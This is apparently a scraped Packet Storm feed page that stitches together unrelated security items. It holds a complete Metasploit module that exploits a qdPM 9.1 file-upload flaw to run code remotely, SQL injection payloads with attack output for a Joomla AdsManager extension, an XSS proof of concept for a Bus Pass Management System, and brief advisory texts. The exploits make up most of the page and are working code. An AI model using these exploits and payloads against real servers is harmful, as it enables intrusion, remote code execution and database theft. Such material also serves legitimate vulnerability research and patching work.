iQIVAwUBYzSXBtzjgjWX9erEAQjKrQ//UMJzCqtbTKo49Rw2Q5bNpiBbMYIczHLu  
uVWQDb82h2K2Ky3qpGHMIQuhMb/pr0k+9Q+MzjEzkIEnDW4iwXvApz2snWy+jXD9  
nqnsBPuQqU/4bCGIJYRw+b6/onxXUzFU58opqkoOcOR1bEpc+7VTCwGwH6KExb3s  
X6BQTyLmIHkcdMl6qzDtw4JqU591mDgujbxAXo/FTh2C2gIaFV1/TWHNNRe6OoDJ  
1HQqthx4aWoY4rK2cHLdwuG0gdGK6QTy/lEAu0+79YiVYrBgWK5yTuyyyLGD8SXQ  
Fn+c4KMjIO3I1FbQwzGmYuRjrQjatJZJczRt+MLo5DxoSbraf7Y7zn3lI6VtKPX9  
snqgjZ6vZ0AUkN2bMRRtiA0QRTkqy/FAr+OlSdJaLCLGXRKZfk8vh7Es4bYpO8Mx  
2GzpwthdFyyWcgyoEDI6WCp4t4oaAkKZu5rLoa8563icrcTLRMAdUM4IMNuUOI1q  
S4ovejF2K4G7gaUS2V/i5N298+B8vr10yEtNPHiQ7SZKdjQ+SXD+fkr2Joz/GsSo  
ozjIYjBsi/Oglk3G7CVJPWUVWf+CsLZHg3ucSsCT2FMFkACtZLbht1wEHzg5kvWc  
Qj6KpVi4RJ+ZrYrMCi0EB0ejYbQrkLQpCBIRmN7zLrEyPB+qTq2yquYHffmSpdmW  
jfydo6q/6as=  
=rbbu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6741-01

A remote code execution vulnerability exists in qdPM versions 9.1 and below. An attacker can upload a malicious PHP code file via the profile photo functionality by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature thus allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::EXE  include Msf::Exploit::PhpEXE  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE)',        'Description' => %q{          A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier.          An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal          vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection.          NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.        },        'License' => MSF_LICENSE,        'Author' => [          'Rishal Dwivedi (Loginsoft)', # Discovery          'Leon Trappett (thepcn3rd)', # PoC          'Giacomo Casoni' # Metasploit        ],        'References' => [          ['CVE', '2020-7246'],          ['EDB', '50175']        ],        'Payload' => {          'BadChars' => "\x00"        },        'DefaultOptions' => {          'EXITFUNC' => 'thread'        },        'Platform' => %w[linux php],        'Targets' => [          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],          [ 'Windows x86', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],          [ 'Windows x64', { 'Arch' => ARCH_X64, 'Platform' => 'win' } ]        ],        'Privileged' => true,        'DisclosureDate' => '2020-11-21',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => ['CRASH_SAFE'],          'Reliability' => ['IOC_IN_LOGS'],          'SideEffects' => ['REPEATABLE_SESSION']        }      )    )    register_options(      [        OptString.new('TARGETURI', [true, 'The base directory where qdPM resides', '/']),        OptString.new('EMAIL', [true, 'The email to login with']),        OptString.new('PASSWORD', [true, 'The password to login with'])      ]    )    self.needs_cleanup = true  end  def check    uri = normalize_uri(uri, '/index.php')    res = send_request_raw({ 'uri' => uri })    if res.nil?      return Exploit::CheckCode::Unknown    end    login_page = res.get_html_document    begin      version_num = login_page.at('div[@class="copyright"]').at('a').text.tr('qdPM ', '').to_f    rescue StandardError      return Exploit::CheckCode::Unknown    end    version = Rex::Version.new(version_num)    if version <= Rex::Version.new('9.1')      return Exploit::CheckCode::Appears    else      return Exploit::CheckCode::Safe    end  end  def get_write_exec_payload_win(fname, _data)    p = Rex::Text.encode_base64(generate_payload_exe)    php = %|    <?php    $f = fopen("#{fname}", "wb");    fwrite($f, base64_decode("#{p}"));    fclose($f);    exec("C:\\Windows\\System32\\cmd.exe /c #{fname}");    ?>    |    php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ')    return php  end  def login(base, username, password)    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri("#{base}/index.php/login"),      'keep_cookies' => true    })    login_page = res.get_html_document    csrf_token = login_page.at("input[name='login[_csrf_token]']/@value")    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri("#{base}/index.php/login"),      'vars_post' => {        'login[email]' => username,        'login[password]' => password,        'login[_csrf_token]' => csrf_token      },      'keep_cookies' => true,      'headers' => {        'Origin' => "http://#{rhost}",        'Referer' => "http://#{rhost}/#{base}/index.php/login"      }    })    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri("#{base}/index.php/myAccount"),      'keep_cookies' => true,      'headers' => {        'Host' => rhost.to_s      }    })    account_page = res.get_html_document    begin      userid = account_page.at("input[@name='users[id]']/@value").text.strip    rescue StandardError      print_error('The designated admin account does not have a user ID.')      return {}    end    username = account_page.at("input[@name='users[name]']/@value").text.strip    csrftoken_ = account_page.at("input[@name='users[_csrf_token]']/@value").text.strip    opts = {      'user_id' => userid,      'name' => username,      'csrf_token' => csrftoken_    }    return opts  end  def upload_php(base, opts)    fname = opts['filename']    php_payload = opts['data']    user_id = opts['user_id']    email = opts['email']    csrf_token = opts['csrf_token']    data = [      { 'name' => 'sf_method', 'data' => 'put' },      { 'name' => 'users[id]', 'data' => user_id },      { 'name' => 'users[photo_preview]', 'data' => '.htaccess' },      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },      { 'name' => 'users[new_password]', 'data' => '' },      { 'name' => 'users[email]', 'data' => email },      { 'name' => 'extra_fields[9]', 'data' => '' },      { 'name' => 'users[remove_photo]', 'data' => '1' }    ]    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),      'vars_form_data' => data,      'keep_cookies' => true,      'headers' => {        'Origin' => "http://#{rhost}",        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"      }    )    data = [      { 'name' => 'sf_method', 'data' => 'put' },      { 'name' => 'users[id]', 'data' => user_id },      { 'name' => 'users[photo_preview]', 'data' => '../.htaccess' },      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },      { 'name' => 'users[new_password]', 'data' => '' },      { 'name' => 'users[email]', 'data' => email },      { 'name' => 'extra_fields[9]', 'data' => '' },      { 'name' => 'users[remove_photo]', 'data' => '1' }    ]    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),      'vars_form_data' => data,      'keep_cookies' => true,      'headers' => {        'Origin' => "http://#{rhost}",        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"      }    )    data = [      { 'name' => 'sf_method', 'data' => 'put' },      { 'name' => 'users[id]', 'data' => user_id },      { 'name' => 'users[_csrf_token]', 'data' => csrf_token },      { 'name' => 'users[new_password]', 'data' => '' },      { 'name' => 'users[email]', 'data' => email },      { 'name' => 'extra_fields[9]', 'data' => '' },      { 'name' => 'users[remove_photo]', 'data' => '1' },      { 'name' => 'users[photo]', 'data' => php_payload, 'mime_type' => 'application/octet-stream', 'filename' => fname }    ]    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri("#{base}/index.php/myAccount/update"),      'vars_form_data' => data,      'keep_cookies' => true,      'headers' => {        'Origin' => "http://#{rhost}",        'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"      }    })    return res.code == 302  end  def exec_php(base, _opts)    res = send_request_cgi({      'uri' => normalize_uri("#{base}/index.php/myAccount"),      'keep_cookies' => true    })    home_page = res.get_html_document    backdoor = home_page.at("//input[@name='users[photo_preview]']/@value").text.strip    register_file_for_cleanup(backdoor)    send_request_cgi({      'uri' => normalize_uri("#{base}/uploads/users/#{backdoor}")    })  end  def exploit    uri = normalize_uri(target_uri.path)    user = datastore['EMAIL']    pass = datastore['PASSWORD']    print_status("Attempt to login with '#{user}:#{pass}'")    opts = login(uri, user, pass)    if opts.empty?      print_error('Login unsuccessful or bad (admin) user')      return    end    php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"    case target['Platform']    when 'php'      p = get_write_exec_payload    when 'linux'      p = get_write_exec_payload(unlink_self: true)    when 'win'      bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"      bin = generate_payload_exe      p = get_write_exec_payload_win(bin_name.to_s, bin)      print_warning("#{bin_name} will require manual cleanup")    end    print_status("Uploading PHP payload (#{p.length} bytes)...")    data = {      'email' => user.to_s,      'filename' => php_fname,      'data' => p    }    data = data.merge(opts)    uploader = upload_php(uri, data)    if !uploader      print_error('Unable to upload')      return    end    print_status("Executing '#{php_fname}'")    exec_php(uri, opts)  endend

qdPM 9.1 Authenticated Shell Upload

testssl.sh is a free command line tool which checks a server's service on any port for the support of TLS/SSL ciphers, protocols as well as recent cryptographic flaws, and much more. It is written in (pure) bash, makes only use of standard Unix utilities, openssl and last but not least bash sockets.

TestSSL 3.0.8

Joomla AdsManager extension version 3.2.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : JULOA                                                                      ││  Software : AdsManager 3.2.0 Extension for Joomla                                      ││  Vuln Type: SQL Injection                                                              ││  Method   : POST                                                                       ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise                                                                     ││                                                                                        ││                                                                                        ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘POST parameter 'ad_vectormap' is vulnerable---Parameter: ad_vectormap (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause    Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') RLIKE (SELECT (CASE WHEN (8892=8892) THEN '' ELSE 0x28 END))-- TnXM&advsearch=0&new_search=1    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') AND (SELECT 2373 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(2373=2373,1))),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- lAQM&advsearch=0&new_search=1    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') AND (SELECT 4095 FROM (SELECT(SLEEP(5)))TLzG)-- UmxX&advsearch=0&new_search=1---[+] Starting the Attack[INFO] fetching current databasethe back-end DBMS is MySQLweb application technology: PHP 7.4.30, Nginxback-end DBMS: MySQL >= 5.0 (MariaDB fork)current database: 'c1demosource'[-] Done

Joomla AdsManager 3.2.0 SQL Injection

Bus Pass Management System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Bus Pass Management System 1.0 - 'searchdata' Cross-Site Scripting (XSS)# Date: 2022-07-02# Exploit Author: Ali Alipour# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip# Version: 1.0# Tested on: Windows 10 Pro x64 - XAMPP Server# CVE : N/A#Issue Detail:The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response.This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.# Vulnerable page: /buspassms/download-pass.php# Vulnerable Parameter: searchdata [ POST Data ]#Request : POST /buspassms/download-pass.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3Origin: https://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: https://127.0.0.1/buspassms/download-pass.phpContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateAccept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 25searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search=#Response : HTTP/1.1 200 OKDate: Fri, 01 Jul 2022 00:14:25 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8X-Powered-By: PHP/7.4.8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 6425Connection: closeContent-Type: text/html; charset=UTF-8<!DOCTYPE html><html lang="en"><head><title>Bus Pass Management System || Pass Page</title><script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba...[SNIP]...<h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4>...[SNIP]...

Bus Pass Management System 1.0 Cross Site Scripting

Ubuntu Security Notice 5646-1 - Tobias Stoeckmann discovered that libXi did not properly manage memory when handling X server responses. A remote attacker could use this issue to cause libXi to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5646-1September 28, 2022libxi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:Several security issues were fixed in libxi.Software Description:- libxi: X11 Input extension libraryDetails:Tobias Stoeckmann discovered that libXi did not properly manage memorywhen handling X server responses. A remote attacker could use this issueto cause libXi to crash, resulting in a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   libxi6                          2:1.7.6-1ubuntu0.1~esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5646-1   CVE-2016-7945, CVE-2016-7946

Source

Packet Storm